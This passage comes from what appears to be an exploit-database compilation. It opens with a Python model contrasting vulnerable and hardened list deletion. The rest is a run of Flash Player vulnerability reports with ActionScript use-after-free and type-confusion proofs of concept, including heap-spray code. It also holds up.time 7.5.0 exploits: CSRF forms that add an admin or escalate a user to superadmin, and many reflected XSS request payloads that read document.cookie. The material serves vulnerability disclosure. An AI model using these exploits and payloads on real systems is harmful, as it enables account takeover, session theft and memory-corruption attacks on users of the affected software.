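        self.on_child_changes = on_child_changes

    def _length(self):
        return len(self.m_children)

    def _child_changes(self):
        if self.on_child_changes:
            self.on_child_changes(self)          # re-entrant: may call back into this object

    def remove_at(self, index):
        if index >= len(self.m_children):
            raise OutOfBoundsRemove("removeAt(%d) with only %d children" % (index, len(self.m_children)))
        del self.m_children[index]

    def del_uint_property_vulnerable(self, index):
        """Mirrors the order quoted above: [1] validate, [2] notify, [3] use the old index."""
        if index >= self._length():              # [1]
            return True
        self._child_changes()                    # [2] script may shrink m_children here
        self.remove_at(index)                    # [3] index was validated against the old length
        return True

    def del_uint_property_hardened(self, index):
        """Same operation, but the element (not the index) survives the callback and is
        located again afterwards, so script mutating the list cannot leave a stale index."""
        if index >= self._length():
            return True
        target = self.m_children[index]
        self._child_changes()
        for i, child in enumerate(self.m_children):
            if child is target:                  # identity, not equality: children may compare equal
                self.remove_at(i)
                break
        return True                              # nothing left to do if the script already removed it


class Node:
    """Distinct child objects so that identity checks are meaningful."""

    def __init__(self, name):
        self.name = name


def script_that_shrinks(xml_list):
    """Models ActionScript running inside the change callback and removing the first
    child, which shifts every later index down by one."""
    del xml_list.m_children[0]


def demonstrate():
    """Return (vulnerable outcome, hardened outcome) for deleting the last of four children."""
    names = ["a", "b", "c", "d"]
    vulnerable = XMLListModel([Node(n) for n in names], script_that_shrinks)
    try:
        vulnerable.del_uint_property_vulnerable(3)
        vulnerable_outcome = "ok"
    except OutOfBoundsRemove as err:
        vulnerable_outcome = str(err)
    hardened = XMLListModel([Node(n) for n in names], script_that_shrinks)
    hardened.del_uint_property_hardened(3)
    return vulnerable_outcome, [c.name for c in hardened.m_children]
```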

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37872.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=408&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a use-after-free in CreateTextField. Consider a flash file containing a MovieClip hierarchy such as:

_root-->l1-->l2-->l3

If createTextField is called on l2 to create l3, and that call invokes a function that deletes l2 or l1, a use-after-free occurs. A POC is as follows:

var l1 = this.createEmptyMovieClip("l1", 1);
var l2 = l1.createEmptyMovieClip("l2", 1);
ns = {toString: strfunc, valueOf: strfunc};
var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);

function strfunc(){
	l2.removeMovieClip();
	return "myname";
}

A sample SWF and fla are attached.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37873.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=409&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a type confusion issue in TextRenderer.setAdvancedAntialiasingTable. If the font, insideCutoff or outsideCutoff are set to objects that are not integers, they are still assumed to be integers. A proof-of-concept is below:

var antiAliasEntry_1 = {fontSize:10, insideCutoff:1.61, outsideCutoff:-3.43};
var antiAliasEntry_2 = {fontSize:"", insideCutoff:0.8, outsideCutoff:-0.8};
var arialTable:Array = new Array(antiAliasEntry_1, antiAliasEntry_2);

TextRenderer.setAdvancedAntialiasingTable("Arial", "none", "dark", arialTable);

This issue is low-impact because the type-confused objects are read into the font and cutoff values, which cannot be directly retrieved from script. It is probably possible to determine the value read by doing hit tests on the text that is rendered (to see how big and clipped it is), but this would be fairly difficult.

A sample SWF and fla are attached; these samples intentionally crash to demonstrate the issue.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37874.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=416&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

This issue is a variant of issue 192, which the fix did not address.

If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.

A PoC is as follows:

class subsocket extends flash.display.BitmapData{

	public function subsocket(){
		var n = {valueOf : func};
		this.valueOf = func;
		var x = new XMLSocket();

		x.connect.call(this, "127.0.0.1", this);
	}

	function func(){
		if(this){
		}
		this.__proto__ = {};
		this.__proto__.__constructor__ = flash.display.BitmapData;
		super(10, 10, true, 10);
		return 80;
	}

}

A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37876.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=410&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

The following crash was observed in Flash Player 17.0.0.188 on Windows:

(81c.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37397006 ebx=00000000 ecx=008c0493 edx=09f390d0 esi=08c24d98 edi=09dc2000
eip=07a218cb esp=015eda80 ebp=015edb24 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050216
Flash32_17_0_0_188+0x18cb:
07a218cb ff6004           jmp   dword ptr [eax+0x4] ds:0023:3739700a=????????

- The test case reproduces on Windows 7 using IE11. It does not appear to immediately reproduce on Windows+Chrome or Linux+Chrome.

- The crash can also reproduce on one of the two mov instructions prior to the jmp shown here.

- The crash appears to occur due to a use-after-free related to loading a sub-resource from a URL.

- The test case minimizes to an 11-bit difference from the original sample file.

- The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37875.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a use-after-free in the TextField gridFitType setter. A PoC is below:

var test = this.createTextField("test", 1, 0, 0, 100, 100);
var n = {toString : func, valueOf : func};
test.gridFitType = n;

function func(){
	test.removeTextField();
	for(var i = 0; i < 1000; i++){
		var b = new flash.display.BitmapData(1000, 1000, true, 10);
	}
	trace("here");
	return "natalie";
}

A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition; additional SWFs are attached.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37877.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=422&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a type confusion issue in the TextFormat constructor that is reachable because the FileReference constructor does not verify that the incoming object is of type Object (it only checks that the object is not native backed). The TextFormat constructor first sets a new object to type TextFormat, and then calls into script several times before setting the native backing object. If one of these script calls then calls into the FileReference constructor, the object can be set to type FileReference, and then the native object will be set to the TextFormat, leading to type confusion. A PoC is as follows:

In the main SWF:

var a = new subfr();
var allTypes:Array = new Array();
var imageTypes:Object = new Object();
imageTypes.description = "Images (*.jpg, *.jpeg, *.gif, *.png)";
imageTypes.extension = "*.jpg; *.jpeg; *.gif; *.png";
allTypes.push(imageTypes);

var textTypes:Object = new Object();
textTypes.description = "Text Files (*.txt, *.rtf)";
textTypes.extension = "*.txt;*.rtf";
allTypes.push(textTypes);
var f = new flash.net.FileReference();
f.cancel.call(a);

Defining subfr:

class subfr extends Object{

	public function subfr(){
		var n = {valueOf : func};
		this.valueOf = func;
		this.toString = func;
		this.__proto__ = {};
		this.__proto__.__constructor__ = TextFormat;
		super(this);
	}

	function func(){
		this.__proto__ = {};
		this.__proto__.__constructor__ = flash.net.FileReference;
		super();
		return "natalie";
	}

}

A sample SWF and fla are attached.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37878.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=444&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Tracking for https://code.google.com/p/chromium/issues/detail?id=498984]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.

This is Issue 457278 resurrected. Again.

VERSION
Chrome Version: [43.0.2357.124, Flash 18.0.0.160]
Operating System: [Windows 7 x64 SP1]

REPRODUCTION CASE
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.

Flash 17.0.0.169 added a flag to mitigate Issue 457278:
.text:004D6F0B                 mov     esi, [esp+2Ch+var_C]
.text:004D6F0F                 push    1               ; char
.text:004D6F11                 mov     ecx, edi        ; int
.text:004D6F13                 mov     byte ptr [esi+0Ch], 1   ; this flag was added
.text:004D6F17                 call    xparseAS2Code
.text:004D6F1C                 mov     byte ptr [esi+0Ch], 0

Flash 18.0.0.160 added another flag to mitigate Issue 476926:
.text:004D6E3E loc_4D6E3E:
.text:004D6E3E                 cmp     byte ptr [ebp+0Ch], 0   ; this flag was added
.text:004D6E42                 lea     eax, [ebp+0Ch]
.text:004D6E45                 mov     [esp+2Ch+var_8], eax
.text:004D6E49                 jz      short loc_4D6E58
.text:004D6E4B                 mov     ecx, dword_E50A40
.text:004D6E51                 call    sub_967730
.text:004D6E58
.text:004D6E58 loc_4D6E58:
.text:004D6E58                 mov     byte ptr [eax], 1
.text:004D6E5B                 jmp     short loc_4D6E65


But they didn't figure it was possible to execute AS2 code a bit above in the function:
.text:004D6E6F                 mov     eax, [ebp+0]
.text:004D6E72                 push    0
.text:004D6E74                 lea     edx, [esp+34h+var_14]
.text:004D6E78                 push    edx
.text:004D6E79                 mov     edx, [eax+14h]
.text:004D6E7C                 mov     ecx, ebp
.text:004D6E7E                 call    edx        ; return the filter name
.text:004D6E80                 push    eax
.text:004D6E81                 lea     eax, [esp+3Ch+var_10]
.text:004D6E85                 push    eax
.text:004D6E86                 mov     ecx, edi
.text:004D6E88                 call    xcreateStringObject
.text:004D6E8D                 mov     ebx, [esp+38h+arg_4]
.text:004D6E91                 push    eax
.text:004D6E92                 push    ecx
.text:004D6E93                 mov     eax, esp
.text:004D6E95                 mov     ecx, edi
.text:004D6E97                 mov     [eax], ebx
.text:004D6E99                 call    sub_420400  ; execute some AS2 with a custom __proto__ object

For example:
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {}); 
flash.filters = oob


Tested on Flash Player standalone 18.0.0.160, and Chrome 43.0.2357.124.
That should crash while dereferencing 0x41424344.

Compile with Flash CS 5.5.


***************************************************************************
Content of FiltusPafusTer.fla

import flash.filters.GlowFilter;

var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
	a2[i] = 0x41424344
}

for (var i = 0; i<0x200;i++) {
	var tf:TextFormat = new TextFormat()
	a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
	a1[i].tabStops = a2
}

var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]


function f() {
	for (var i = 0; i<0x20;i++) {
		_global.a1[0x100+i*4].tabStops = [1,2,3,4]
	}

	_global.tfield.filters = []
	for (var i = 0; i<0x200;i++) {
		_global.a1[i].tabStops = a2
	}
	
}

_global.tfield = tfield
_global.a1 = a1
_global.a2 = a2

var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {}); 
flash.filters = oob

var a = tfield.filters

---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37883.zip
            

up.time 7.5.0 XSS And CSRF Add Admin Exploit


Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)

Summary: The next-generation of IT monitoring software.

Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Multiple
cross-site scripting vulnerabilities were also discovered.
The issue is triggered when input passed via multiple
parameters is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of
an affected site.

Tested on: Jetty, PHP/5.4.34, MySQL
           Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5252
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php


29.07.2015

--


CSRF Add Admin:
---------------

<html>
  <body>
    <form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=add&id=0" method="POST">
      <input type="hidden" name="operation" value="submit" />
      <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
      <input type="hidden" name="username" value="Testingus4" />
      <input type="hidden" name="password" value="123123" />
      <input type="hidden" name="passwordConfirm" value="123123" />
      <input type="hidden" name="firstname" value="Test" />
      <input type="hidden" name="lastname" value="Ingus" />
      <input type="hidden" name="location" value="Neverland" />
      <input type="hidden" name="emailaddress" value="test4&#64;test&#46;test" />
      <input type="hidden" name="emailtimeperiodid" value="1" />
      <input type="hidden" name="phonenumber" value="111111" />
      <input type="hidden" name="phonenumbertimeperiodid" value="1" />
      <input type="hidden" name="windowshost" value="test" />
      <input type="hidden" name="windowsworkgroup" value="testgroup" />
      <input type="hidden" name="windowspopuptimeperiodid" value="1" />
      <input type="hidden" name="landingpage" value="MyPortal" />
      <input type="hidden" name="isonvacation" value="0" />
      <input type="hidden" name="receivealerts" value="on" />
      <input type="hidden" name="receivealerts" value="1" />
      <input type="hidden" name="alertoncritical" value="on" />
      <input type="hidden" name="alertoncritical" value="1" />
      <input type="hidden" name="alertonwarning" value="on" />
      <input type="hidden" name="alertonwarning" value="1" />
      <input type="hidden" name="alertonunknown" value="on" />
      <input type="hidden" name="alertonunknown" value="1" />
      <input type="hidden" name="alertonrecovery" value="on" />
      <input type="hidden" name="alertonrecovery" value="1" />
      <input type="hidden" name="activexgraphs" value="0" />
      <input type="hidden" name="newuser" value="on" />
      <input type="hidden" name="newuser" value="1" />
      <input type="hidden" name="userroleid" value="2" />
      <input type="hidden" name="usergroupid&#91;&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Reflected XSS:
--------------

GET /main.php?section=UserContainer&subsection=edit&id=bc6ac%22%3E%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29;%3E&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1a416c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea233bd169b0 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=14f2e6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cfd43d432&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac"><img%20src%3da%20onload%3dalert(1)>f2c23&name=Testingus4 HTTP/1.1
-
GET /main.php?page=Users&subPage=UserContainer&subsection=view&id=240689'%3balert(1)%2f%2f205 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=6&name=Testingus4e8b7f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadfb7 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit7bef8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9095&id=6&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add270d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c1acb1f950&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28a3345"><img%20src%3da%20onload%3dalert(1)>2d6845d9556&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3a00%3a006795f"><img%20src%3da%20onload%3dalert(1)>c92fbc98475&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28c0570"><img%20src%3da%20onload%3dalert(1)>77b8cd697e9&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3a59%3a592b983"><img%20src%3da%20onload%3dalert(1)>0d9cc3967ae&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane26cca6"><img%20src%3da%20onload%3dalert(1)>84e475837bc&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
            
<!--
up.time 7.5.0 Superadmin Privilege Escalation Exploit


Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)

Summary: The next-generation of IT monitoring software.

Desc: up.time suffers from a privilege escalation issue.
A normal user can elevate his/her privileges by sending
a POST request setting the parameter 'userroleid' to 1.
An attacker can also exploit this issue through cross-site
request forgery attacks.

Tested on: Jetty, PHP/5.4.34, MySQL
           Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5251
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php


29.07.2015

--
-->

<html>
  <body>
    <form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=4" method="POST">
      <input type="hidden" name="operation" value="submit" />
      <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
      <input type="hidden" name="username" value="Testingus2" />
      <input type="hidden" name="password" value="&#42;&#42;&#42;&#42;&#42;" />
      <input type="hidden" name="passwordConfirm" value="&#42;&#42;&#42;&#42;&#42;" />
      <input type="hidden" name="firstname" value="Test" />
      <input type="hidden" name="lastname" value="Ingus" />
      <input type="hidden" name="location" value="Neverland" />
      <input type="hidden" name="emailaddress" value="test2&#64;test&#46;test" />
      <input type="hidden" name="emailtimeperiodid" value="1" />
      <input type="hidden" name="phonenumber" value="111111" />
      <input type="hidden" name="phonenumbertimeperiodid" value="1" />
      <input type="hidden" name="windowshost" value="test" />
      <input type="hidden" name="windowsworkgroup" value="testgroup" />
      <input type="hidden" name="windowspopuptimeperiodid" value="1" />
      <input type="hidden" name="landingpage" value="MyPortal" />
      <input type="hidden" name="isonvacation" value="0" />
      <input type="hidden" name="receivealerts" value="on" />
      <input type="hidden" name="receivealerts" value="1" />
      <input type="hidden" name="alertoncritical" value="on" />
      <input type="hidden" name="alertoncritical" value="1" />
      <input type="hidden" name="alertonwarning" value="on" />
      <input type="hidden" name="alertonwarning" value="1" />
      <input type="hidden" name="alertonunknown" value="on" />
      <input type="hidden" name="alertonunknown" value="1" />
      <input type="hidden" name="alertonrecovery" value="on" />
      <input type="hidden" name="alertonrecovery" value="1" />
      <input type="hidden" name="activexgraphs" value="0" />
      <input type="hidden" name="newuser" value="on" />
      <input type="hidden" name="newuser" value="1" />
      <input type="hidden" name="userroleid" value="1" />
      <input type="hidden" name="usergroupid&#91;&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=484&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Tracking for: https://code.google.com/p/chromium/issues/detail?id=508072]

VULNERABILITY DETAILS
Copy-paste of Issue 480496

VERSION
Chrome Version: N/A yet, Flash 18.0.0.203
Operating System: [Win7 x64 SP1]

REPRODUCTION CASE

Flash 18.0.0.203 patched Issue 480496 by checking whether the internal filter object is still alive after the first Array.length call (from the standalone Flash Player):

.text:004D71DA loc_4D71DA:
.text:004D71DA                 and     ecx, 0FFFFFFF8h
.text:004D71DD                 call    xAS2_getArrayLength
.text:004D71E2                 test    eax, eax
.text:004D71E4                 jle     short loc_4D725D
.text:004D71E6                 mov     ecx, [esp+8+arg_C]
.text:004D71EA                 mov     eax, [ecx+94h]
.text:004D71F0                 test    eax, 0FFFFFFFEh
.text:004D71F5                 jz      short loc_4D7200
.text:004D71F7                 and     eax, 0FFFFFFFEh
.text:004D71FA                 cmp     dword ptr [eax+28h], 0       ; here we check whether the object has been deleted or not
.text:004D71FE                 jnz     short loc_4D720B
.text:004D7200
.text:004D7200 loc_4D7200:
.text:004D7200                 mov     ecx, dword_E51A40
.text:004D7206                 call    sub_968A00                   ; and in that case we suicide


Unfortunately they forgot to do that check after the second Array.length call:

.text:004D721D loc_4D721D:
.text:004D721D                 and     eax, 0FFFFFFF8h
.text:004D7220                 push    edi
.text:004D7221                 mov     edi, eax
.text:004D7223                 mov     ecx, edi
.text:004D7225                 xor     esi, esi
.text:004D7227                 call    xAS2_getArrayLength       ; here we can still execute a script and delete the filters...
.text:004D722C                 test    eax, eax
.text:004D722E                 jle     short loc_4D725C

It should crash like this:
CPU Disasm
Address   Hex dump          Command                                  Comments
004CE27F    8B51 04         MOV EDX,DWORD PTR DS:[ECX+4]
004CE282    8942 04         MOV DWORD PTR DS:[EDX+4],EAX         ; write a pointer to 0x41424344
004CE285    8B51 04         MOV EDX,DWORD PTR DS:[ECX+4]
004CE288    8950 08         MOV DWORD PTR DS:[EAX+8],EDX
004CE28B    FF41 08         INC DWORD PTR DS:[ECX+8]
004CE28E    8941 04         MOV DWORD PTR DS:[ECX+4],EAX
004CE291    C2 0400         RETN 4
004CE294    FF41 08         INC DWORD PTR DS:[ECX+8]


***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "4"
//It's because Flash CS5.5 does not allow naming a property with a numeral

import flash.filters.GlowFilter;

var tfield:TextField = createTextField("tf",1,1,2,3,4)
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
	a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41424344
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
	var tf:TextFormat = new TextFormat()
	a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
	a1[i].tabStops = a2
}
a1[0xFF].tabStops = []

function f() {
	_global.mc.createTextField("tf",1,1,2,3,4)
	a1[0xFE].tabStops = []
	a1[0xFD].tabStops = []
	for (var i = 0x100; i<0x200;i++) {
		_global.a1[i].tabStops = _global.a2
	}
}

_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2

var oCounter:Object = new Object()
oCounter.valueOf = function () {
	_global.counter += 1
	if (_global.counter == 4) f()
	return 10;
}

var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o;


Proof of Concept:
